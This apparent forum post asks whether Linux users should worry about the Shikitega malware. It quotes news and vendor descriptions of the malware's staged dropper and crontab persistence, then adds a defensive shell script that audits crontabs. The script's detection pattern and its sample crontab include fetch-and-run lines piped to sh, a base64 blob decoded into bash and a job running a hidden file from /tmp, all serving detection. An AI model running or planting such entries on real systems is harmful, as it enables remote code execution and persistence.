As a Linux user should I be concerned? Sounds quite scary and sophisticated!
Until now, I thought that Linux was much less vulnerable than Windows, especially when you operate Linux primarily in user mode only!
The article is unfortunately kind of unspecific about what Linux installations are exactly affected:
1) Administrator mode v. user mode
2) Server vs. desktop
So much for sloppy journalism, although ZDNET is a technology-oriented publication.
"A stealthy new form of malware is targeting Linux systems in attacks that can take full control of infected devices – and it is using this access to install crypto-mining malware.
Dubbed Shikitega, the malware targets endpoints and Internet of Things devices that run on Linux operating systems and has been detailed by cybersecurity researchers at AT&T Alien Labs. ...
The malware is delivered in a multi-stage infection chain, where each module responds to commands from the previous part of the payload and downloads and executes the next one.
By downloading the payload bit by bit – starting with a module that is just a few hundred bytes – Shikitega can avoid being uncovered by anti-virus software. It also uses a polymorphic encoder to make it more difficult to detect. ...
The initial method of infection is still unknown, but the malware gradually downloads more and more modules to provide full functionality, starting with the initial dropper, then going through several stages – including downloading Mettle, a Metasploit offensive security tool, which allows the attacker to deploy a wide range of attacks. ..."
From the AT&T cybersecurity blog:
"... With a rise of nearly 650% in malware and ransomware for Linux this year, reaching an all-time high in the first half year of 2022, threat actors find servers, endpoints and IoT devices based on Linux operating systems more and more valuable and find new ways to deliver their malicious payloads. ...
To achieve persistence, the malware will download and execute a total of 5 shell scripts. It persists in the system by setting 4 crontabs, two for the current logged in user and the other two for the user root. ..."
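The persistence mechanism the AT&T quote describes (crontab entries for the logged-in user and for root that fetch and run further stages) is something an ordinary Linux user can audit for. The shell script below is an added example, not code from the post or from AT&T Alien Labs: it flags crontab entries that pipe a download into a shell, decode an inline blob into a shell, or execute out of a scratch directory. The regex, the function names and the sample crontab are constructed assumptions, not indicators from the report.

```shell
#!/bin/sh
# Added example (not code from the post or from AT&T Alien Labs): audit crontab
# entries for the download-and-execute persistence the quoted report describes.
# The regex and the sample crontab below are constructed assumptions.

# Commands that fetch a payload and pipe it to a shell, decode an inline blob
# into a shell, or run something out of a world-writable scratch directory.
SUSPICIOUS_CMD_RE='(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)[^|]*[|][[:space:]]*(ba)?sh|(^|[[:space:]])(/tmp|/var/tmp|/dev/shm)/'

# audit_crontab_text USER < crontab-text
# Prints "USER<TAB>entry" for each entry whose command field matches the regex.
audit_crontab_text() {
    user="$1"
    while IFS= read -r line; do
        case "$line" in
            ''|'#'*|[A-Za-z_]*) continue ;;  # blank, comment, or VAR=value line
            @*) cmd=$(printf '%s\n' "$line" | awk '{ $1=""; print }') ;;  # @reboot etc.
            *)  cmd=$(printf '%s\n' "$line" | awk '{ $1=$2=$3=$4=$5=""; print }') ;;
        esac
        if printf '%s\n' "$cmd" | grep -Eq "$SUSPICIOUS_CMD_RE"; then
            printf '%s\t%s\n' "$user" "$line"
        fi
    done
}

# count_suspicious_cron USER < crontab-text: number of flagged entries.
count_suspicious_cron() { audit_crontab_text "$1" | grep -c '^' || true; }

# audit_live_crontabs: the current user's crontab and, when run as root, every
# other user's too (the report says entries are planted for both the logged-in
# user and root).
audit_live_crontabs() {
    crontab -l 2>/dev/null | audit_crontab_text "$(id -un)"
    [ "$(id -u)" -eq 0 ] || return 0
    cut -d: -f1 /etc/passwd | while IFS= read -r u; do
        [ "$u" = "$(id -un)" ] || crontab -l -u "$u" 2>/dev/null | audit_crontab_text "$u"
    done
}

# Constructed sample: one benign job plus three entries in the style above.
SAMPLE_CRONTAB='PATH=/usr/local/bin:/usr/bin:/bin
# nightly backup
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://198.51.100.7/a | sh
@reboot /tmp/.X11-unix/.d
0 * * * * echo aGVsbG8K | base64 -d | bash'

printf '%s\n' "$SAMPLE_CRONTAB" | audit_crontab_text alice
```

Run `audit_live_crontabs` as root to cover every user's crontab; system-wide jobs in /etc/cron.d and /etc/crontab are not read by this script and need a separate pass.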